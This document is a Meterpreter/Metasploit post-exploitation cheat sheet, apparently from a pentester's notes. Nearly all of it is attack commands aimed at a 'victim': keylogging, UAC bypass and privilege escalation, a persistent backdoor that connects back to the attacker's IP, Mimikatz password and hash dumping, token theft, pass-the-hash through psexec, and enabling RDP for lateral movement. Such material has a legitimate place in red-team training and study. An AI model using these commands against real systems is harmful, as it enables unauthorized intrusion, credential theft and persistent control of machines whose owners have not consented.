Meterpreter Commands
1. Basics
help --> List available commands
sysinfo --> Displays system info
getuid --> List current session owner
sessions -i 2 --> Change to session 2
shell --> Drop to interactive shell
channel -i 1 --> Change to shell in channel 1
background --> Background session to interact with msfconsole
upload {local path} {victim path} --> Upload a file
download {path} --> Download file
reg {Command} --> Interacts with registry (reg by itself will list syntax)
execute -f cmd.exe -i --> Execute cmd.exe and interact
execute -f cmd.exe -i -H -t --> Execute cmd as hidden process and with all tokens
- Powershell
load powershell
powershell_execute --> Execute a PowerShell statement, including complex-statements separated by semicolons
powershell_import --> Import a local PowerShell script to execute on the remote system over the Meterpreter channel
powershell_shell --> Launch an interactive PowerShell shell
powershell_session_remove --> Used to remove a PowerShell session when created using execute/import/shell with the -s argument
2. Host Reconnaissance
- List running processes on a system
ps --> List processes
getpid --> List current PID
migrate {PID} --> Migrate to anothe PID
post/windows/manage/migrate --> Make meterpreter migrate to another process.
run service_manager -l --> Lists running services on Windows.
If we are against a non-interactive logon in which the explorer.exe process does not exist, we can create a hidden instance of notepad and migrate into it:
execute -H -f notepad
migrate {PID}
- Screenshots
screengrab --> Run plugin to capture screenshot of user session
- Keylogger
keyscan_start --> Start keylogger
keyscan_stop --> Stop keylogger
keyscan_dump --> Dump keylogger
3. Privilege Escalation
getsystem --> Attempts to elevate privileges.
post/windows/gather/win_privs --> Determine privilege information.
exploit/windows/local/bypassuac_vbs --> Attempts to bypass UAC in order to escalate privileges.
windows/local/bypassuac_fodhelper --> Attempts to bypass UAC with fodhelper method, this should work w/ defender diasbled.
4. Persistence
The exploitation process works this way:
Upload the backdoor on the victim
Execute the file
At prefixed times (i.e. 5-6-10 seconds), it will try to connect back to our listener
Run it automatically at boot
Depending on the OS, this can be done by editing the Windows registry, services, schedules, rc.local, init.d
Thanks to Metasploit, the entire process can be completely automated.
meterpreter > run persistence -h
-A starts the handler on our machine - X start the agent at boot --i 5 connection attempt each 5 seconds -p 8080 the port for the connect back --r [IP_Address] our IP address
Then we can check it:
meterpreter > reg queryval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v nZvDeQvFvEi
meterpreter > ls C:\\Windows\\TEMP\\fl*
Once the process is complete, if we want to get a session on the target machine, we have to start the listener and wait for incoming connections. We can do it by using the exploit/multi/handler module.
Notice that we have to set the same options set with persistence: same payload, IP address, and local port.
5. Mimikatz
hashdump --> Dumps local hashes
load mimikatz --> Loads Mimikatz extension into Meterpreter session.
wdigest --> Use Mimikatz to retrieve passwords.
6. User Impersonation
To impersonate any logged in users and obtain code execution in their context without access to any passwords or hashes:
load incognito
help incognito
list_tokens -u
impersonate_token corp1\\admin
getuid
- Token Impersonation
For pass the ticket attacks or if we elevate or land on a system where a user is running a process, to impersonate it's token:
steal_token {pid}
rev2shell --> Revert to original user
- Pass the Hash
msf exploit(psexec) > set SMBPASS {hash}
msf exploit(psexec) > set SMBUSER {victim username}
SMBUSER => {victim username}
msf exploit(psexec) > set RHSOT {victim PI}
RHOST => {victim IP}
msf exploit(psexec) > exploit
7. Lateral Movement
exploit/windows/smb/psexec
run getgui -e --> Enable the RDP process on target.
rdesktop target -u user -p password --> Initiate an RDP session with target.
Last updated